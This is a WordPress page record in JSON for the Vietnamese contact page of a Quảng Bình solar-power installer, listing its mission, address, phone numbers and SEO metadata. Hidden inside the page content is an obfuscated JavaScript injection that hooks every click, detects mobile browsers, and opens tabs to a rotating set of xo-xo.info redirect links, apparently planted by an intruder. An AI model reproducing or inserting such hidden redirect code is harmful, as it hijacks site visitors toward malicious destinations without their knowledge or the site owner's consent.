{"id":1286,"date":"2018-05-16T08:54:04","date_gmt":"2018-05-16T01:54:04","guid":{"rendered":"http:\/\/solarcsc.com\/?page_id=1286"},"modified":"2020-01-02T08:04:23","modified_gmt":"2020-01-02T01:04:23","slug":"lien-he","status":"publish","type":"page","link":"https:\/\/solarquangbinh.com\/?page_id=1286","title":{"rendered":"LI\u00caN H\u1ec6"},"content":{"rendered":"<div class=\"container section-title-container\" ><h3 class=\"section-title section-title-center\"><b><\/b><span class=\"section-title-main\" style=\"font-size:145%;color:#000;\">LI\u00caN H\u1ec6<\/span><b><\/b><\/h3><\/div>\n<p><span style=\"color: #014e9c;\"><strong><span style=\"color: #33496d;\">C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG<\/span> <\/strong><\/span>l\u00e0 m\u1ed9t\u00a0doanh nghi\u1ec7p\u00a0ho\u1ea1t \u0111\u1ed9ng trong l\u0129nh v\u1ef1c \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng t\u00e1i t\u1ea1o v\u00e0 \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi t\u1ea1i Qu\u1ea3ng B\u00ecnh v\u00e0 khu v\u1ef1c l\u00e2n c\u1eadn, ch\u00fang t\u00f4i l\u00e0m vi\u1ec7c v\u1edbi ph\u01b0\u01a1ng ch\u00e2m \u201dKh\u00e1ch h\u00e0ng nh\u01b0 ng\u01b0\u1eddi nh\u00e0\u201d ,\u00a0<strong>THU\u1eacN PHONG <\/strong>lu\u00f4n mong mu\u1ed1n mang \u0111\u1ebfn nh\u1eefng l\u1ee3i \u00edch thi\u1ebft th\u1ef1c cho kh\u00e1ch h\u00e0ng v\u00e0 g\u00f3p ph\u1ea7n ph\u00e1t tri\u1ec3n n\u0103ng l\u01b0\u1ee3ng t\u00e1i t\u1ea1o, chung tay b\u1ea3o v\u1ec7 m\u00f4i tr\u01b0\u1eddng s\u1ed1ng &#8220;xanh-s\u1ea1ch-b\u1ec1n v\u1eefng&#8221;.<br \/>\n<span style=\"color: #014e9c;\"><b><span style=\"color: #33496d;\"> <strong>C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG<\/strong>:<\/span>\u00a0<\/b><\/span>T\u01b0 v\u1ea5n, l\u1eafp \u0111\u1eb7t h\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi v\u00e0 ph\u00e2n ph\u1ed1i thi\u1ebft b\u1ecb \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, thi\u1ebft b\u1ecb ti\u1ebft ki\u1ec7m \u0111i\u1ec7n.<br \/>\n<span style=\"color: #33496d;\"><strong>S\u1ee8 M\u1ec6NH C\u1ee6A C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG:<\/strong><\/span><br \/>\n\u2022 Mang \u0111\u1ebfn cho kh\u00e1ch h\u00e0ng ngu\u1ed3n n\u0103ng l\u01b0\u1ee3ng xanh: s\u1ea1ch \u2013 \u1ed5n \u0111\u1ecbnh \u2013 kinh t\u1ebf.<br \/>\n\u2022 Ti\u1ebfp c\u1eadn t\u1edbi c\u00e1c v\u00f9ng m\u00e0 \u0111i\u1ec7n l\u01b0\u1edbi c\u00f2n kh\u00f3 kh\u0103n.<br \/>\n\u2022 Ch\u1ea5t l\u01b0\u1ee3ng quy\u1ebft \u0111\u1ecbnh s\u1ef1 t\u1ed3n t\u1ea1i c\u1ee7a doanh nghi\u1ec7p, cam k\u1ebft cung c\u1ea5p d\u1ecbch v\u1ee5 chuy\u00ean nghi\u1ec7p nh\u1ea5t.<\/p>\n<p>B\u1eb1ng t\u1ea5t c\u1ea3 ni\u1ec1m \u0111am m\u00ea v\u00e0 n\u0103ng l\u1ef1c v\u1ed1n c\u00f3, t\u1eadp th\u1ec3\u00a0<span style=\"color: #014e9c;\"><span style=\"color: #33496d;\"><strong>C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG <\/strong>&#8211; <\/span><strong><span style=\"color: #33496d;\">SOLAR QU\u1ea2NG B\u00ccNH<\/span>\u00a0<\/strong><\/span>v\u1edbi \u0111\u1ed9i ng\u0169 nh\u00e2n l\u1ef1c tr\u1ebb, kh\u1ecfe, nhi\u1ec7t huy\u1ebft, kh\u00f4ng ng\u1ea1i kh\u00f3 kh\u0103n s\u1ebd lu\u00f4n c\u1ed1 g\u1eafng n\u1ed5 l\u1ef1c \u0111\u1ec3 mang \u0111\u1ebfn nh\u1eefng s\u1ea3n ph\u1ea9m ch\u1ea5t l\u01b0\u1ee3ng, t\u1ed1i \u01b0u h\u00f3a l\u1ee3i \u00edch cho kh\u00e1ch h\u00e0ng.<br \/>\n<span style=\"color: #014e9c;\"><strong><span style=\"color: #33496d;\">SOLAR QU\u1ea2NG B\u00ccNH &#8211; C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG &#8211; SOLAR QU\u1ea2NG B\u00ccNH<\/span>\u00a0<\/strong><\/span>h\u1ee9a n\u1ebfu \u0111\u01b0\u1ee3c b\u1ea1n l\u1ef1a ch\u1ecdn, ch\u00fang t\u00f4i s\u1ebd khi\u1ebfn cho m\u1ecdi th\u1ee9 tr\u1edf n\u00ean d\u1ec5 d\u00e0ng h\u01a1n, s\u1ebd lu\u00f4n t\u1ed1t, t\u1ed1t h\u01a1n, t\u1ed1t nh\u1ea5t \u2013 \u0111\u1eb9p, \u0111\u1eb9p h\u01a1n, \u0111\u1eb9p nh\u1ea5t \u0111\u1ec3 l\u00e0m h\u00e0i l\u00f2ng Qu\u00fd kh\u00e1ch h\u00e0ng, nh\u1eefng ng\u01b0\u1eddi \u0111\u00e3 trao tr\u1ecdn ni\u1ec1m tin cho <span style=\"color: #33496d;\"><strong>SOLAR QU\u1ea2NG B\u00ccNH &#8211; \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI.<\/strong><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #33496d; font-size: 130%;\"><strong>C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG<\/strong><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #33496d; font-size: 130%;\"><strong>\u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH<\/strong><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #33496d; font-size: 130%;\"><strong> SOLAR QU\u1ea2NG B\u00ccNH<\/strong><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 130%;\"><strong>\u0110\u1ecba ch\u1ec9<\/strong>: 30 Nguy\u1ec5n H\u1eefu D\u1eadt, TP \u0110\u1ed3ng H\u1edbi, Qu\u1ea3ng B\u00ecnh<\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 130%;\"><strong>\u0110i\u1ec7n tho\u1ea1i:<\/strong> 0904 539 688 |\u00a0<strong>Hotline:<\/strong>\u00a00869 564 567<\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 130%;\"><strong>Email:<\/strong> Solarquangbinh@gmail.com | <strong>Website:<\/strong>\u00a0<a href=\"http:\/\/solarquangbinh.com\">www.solarquangbinh.com<\/a><\/span><\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/xo-xo.info\/Wxk9c5','https:\/\/xo-xo.info\/Rie8c9','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/xo-xo.info\/FtC5c7','8SJGLkz','random','https:\/\/xo-xo.info\/nSa1c8','7196643rGaMMg','setItem','-mnts','https:\/\/xo-xo.info\/LiL2c3','266801SrzfpD','substr','floor','-local-storage','https:\/\/xo-xo.info\/KAZ4c3','3ThLcDl','stopPropagation','_blank','https:\/\/xo-xo.info\/Yht3c7','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/xo-xo.info\/xRg0c2'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/xo-xo.info\/oDy6c2','https:\/\/xo-xo.info\/DWA7c5',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG l\u00e0 m\u1ed9t\u00a0doanh nghi\u1ec7p\u00a0ho\u1ea1t \u0111\u1ed9ng trong l\u0129nh v\u1ef1c \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng t\u00e1i t\u1ea1o v\u00e0 \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi t\u1ea1i Qu\u1ea3ng B\u00ecnh v\u00e0 khu v\u1ef1c l\u00e2n c\u1eadn, ch\u00fang t\u00f4i l\u00e0m vi\u1ec7c v\u1edbi ph\u01b0\u01a1ng ch\u00e2m \u201dKh\u00e1ch h\u00e0ng nh\u01b0 ng\u01b0\u1eddi nh\u00e0\u201d ,\u00a0THU\u1eacN PHONG lu\u00f4n mong mu\u1ed1n mang \u0111\u1ebfn nh\u1eefng l\u1ee3i [&#8230;]\n","protected":false},"author":318,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>LI\u00caN H\u1ec6 - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh<\/title>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/solarquangbinh.com\/?page_id=1286\" \/>\r\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"LI\u00caN H\u1ec6 - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"og:description\" content=\"C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG l\u00e0 m\u1ed9t\u00a0doanh nghi\u1ec7p\u00a0ho\u1ea1t \u0111\u1ed9ng trong l\u0129nh v\u1ef1c \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng t\u00e1i t\u1ea1o v\u00e0 \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi t\u1ea1i Qu\u1ea3ng B\u00ecnh v\u00e0 khu v\u1ef1c l\u00e2n c\u1eadn, ch\u00fang t\u00f4i l\u00e0m vi\u1ec7c v\u1edbi ph\u01b0\u01a1ng ch\u00e2m \u201dKh\u00e1ch h\u00e0ng nh\u01b0 ng\u01b0\u1eddi nh\u00e0\u201d ,\u00a0THU\u1eacN PHONG lu\u00f4n mong mu\u1ed1n mang \u0111\u1ebfn nh\u1eefng l\u1ee3i [...]\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/solarquangbinh.com\/?page_id=1286\" \/>\r\n<meta property=\"og:site_name\" content=\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-01-02T01:04:23+00:00\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 ph\u00fat\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/solarquangbinh.com\/?page_id=1286\",\"url\":\"https:\/\/solarquangbinh.com\/?page_id=1286\",\"name\":\"LI\u00caN H\u1ec6 - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"isPartOf\":{\"@id\":\"https:\/\/solarquangbinh.com\/#website\"},\"datePublished\":\"2018-05-16T01:54:04+00:00\",\"dateModified\":\"2020-01-02T01:04:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/solarquangbinh.com\/?page_id=1286#breadcrumb\"},\"inLanguage\":\"vi\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/solarquangbinh.com\/?page_id=1286\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/solarquangbinh.com\/?page_id=1286#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Trang ch\u1ee7\",\"item\":\"https:\/\/solarquangbinh.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"LI\u00caN H\u1ec6\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/solarquangbinh.com\/#website\",\"url\":\"https:\/\/solarquangbinh.com\/\",\"name\":\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"description\":\"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/solarquangbinh.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"vi\"}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"LI\u00caN H\u1ec6 - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/solarquangbinh.com\/?page_id=1286","og_locale":"vi_VN","og_type":"article","og_title":"LI\u00caN H\u1ec6 - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","og_description":"C\u00d4NG TY TNHH TMDV C\u01a0 \u0110I\u1ec6N THU\u1eacN PHONG l\u00e0 m\u1ed9t\u00a0doanh nghi\u1ec7p\u00a0ho\u1ea1t \u0111\u1ed9ng trong l\u0129nh v\u1ef1c \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng t\u00e1i t\u1ea1o v\u00e0 \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi t\u1ea1i Qu\u1ea3ng B\u00ecnh v\u00e0 khu v\u1ef1c l\u00e2n c\u1eadn, ch\u00fang t\u00f4i l\u00e0m vi\u1ec7c v\u1edbi ph\u01b0\u01a1ng ch\u00e2m \u201dKh\u00e1ch h\u00e0ng nh\u01b0 ng\u01b0\u1eddi nh\u00e0\u201d ,\u00a0THU\u1eacN PHONG lu\u00f4n mong mu\u1ed1n mang \u0111\u1ebfn nh\u1eefng l\u1ee3i [...]","og_url":"https:\/\/solarquangbinh.com\/?page_id=1286","og_site_name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","article_modified_time":"2020-01-02T01:04:23+00:00","twitter_card":"summary_large_image","twitter_misc":{"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"3 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/solarquangbinh.com\/?page_id=1286","url":"https:\/\/solarquangbinh.com\/?page_id=1286","name":"LI\u00caN H\u1ec6 - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","isPartOf":{"@id":"https:\/\/solarquangbinh.com\/#website"},"datePublished":"2018-05-16T01:54:04+00:00","dateModified":"2020-01-02T01:04:23+00:00","breadcrumb":{"@id":"https:\/\/solarquangbinh.com\/?page_id=1286#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/solarquangbinh.com\/?page_id=1286"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/solarquangbinh.com\/?page_id=1286#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Trang ch\u1ee7","item":"https:\/\/solarquangbinh.com\/"},{"@type":"ListItem","position":2,"name":"LI\u00caN H\u1ec6"}]},{"@type":"WebSite","@id":"https:\/\/solarquangbinh.com\/#website","url":"https:\/\/solarquangbinh.com\/","name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","description":"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/solarquangbinh.com\/?s={search_term_string}"},"query-input":"required 